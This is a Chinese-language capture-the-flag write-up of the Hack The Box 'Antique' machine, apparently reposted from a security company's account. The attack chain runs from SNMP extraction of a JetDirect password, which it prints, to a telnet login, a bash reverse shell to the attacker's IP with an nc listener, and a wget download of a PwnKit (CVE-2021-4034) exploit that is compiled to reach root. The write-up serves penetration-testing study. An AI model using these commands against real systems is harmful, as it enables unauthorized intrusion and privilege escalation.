Hack The Box-Antique

admin 2022年7月12日21:42:56安全文章评论20 views1592字阅读5分18秒阅读模式

0x01 靶场描述

    Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。Antique特性如图:Hack The Box-Antique

0x02 靶场复现

知识点: 端口/漏洞扫描、HP JetDirect利用、cve-2021-4034提权


一、端口/漏洞扫描,HP JetDirect利用

1.使用nmap扫描,发现该目标开启了23端口

nmap -A -sS -sC -sV 10.10.11.107 #-A强力扫描 -sS SYN扫描 -sV识别服务版本 -sC调用脚本扫描

Hack The Box-Antique


2.连接发现其为HP JetDirect打印机服务

telnet 10.10.11.107

Hack The Box-Antique


3.使用SNMP漏洞远程获取JetDirect密码,其密码为一串hex值,打印机漏洞参考http://www.irongeek.com/i.php?page=security/networkprinterhacking

snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0

Hack The Box-Antique


4.解码,https://gchq.github.io/CyberChef/

密码:P@ssw0rd@123!!123..q..

Hack The Box-Antique


5.登录telnet并反弹shell

1.连接,并输入密码:P@ssw0rd@123!!123..q..telnet 10.10.11.107
2.查看是否有execexec which bash
3.反弹shellexec bash -c 'bash -i >& /dev/tcp/10.10.14.5/7777 0>&1'
4.监听,得到一个shellnc -lvvp 7777
5.查看user的flagcat ~/user.txt

Hack The Box-Antique


二、cve-2021-4034提权

前置知识: 2022年1月25日,Qualys宣布发现了一个本地提权漏洞,并将其识别为PwnKit。PwnKit漏洞影响PolicyKit的pkexecSUID-root程序,该程序默认安装在许多Linux发行版上。漏洞细节:https://www.datadoghq.com/blog/pwnkit-vulnerability-overview-and-remediation/

POC下载地址:https://github.com/arthepsy/CVE-2021-4034

影响版本:

Hack The Box-Antique

Hack The Box-Antique


1.上传编译并运行脚本,成功提权到root

1.python开启http服务让靶机下载python3 -m http.server 80 
2.下载pocwget http://10.10.14.5/cve-2021-4034-poc.c
3.编译pocgcc cve-2021-4034-poc.c -o cve-2021-4034-poc
4.运行./cve-2021-4034-poc
5.查看rootflagcat /root/root.txt

Hack The Box-Antique

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog


原文始发于微信公众号(融云攻防实验室):Hack The Box-Antique

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月12日21:42:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Hack The Box-Antique http://cn-sec.com/archives/1172863.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: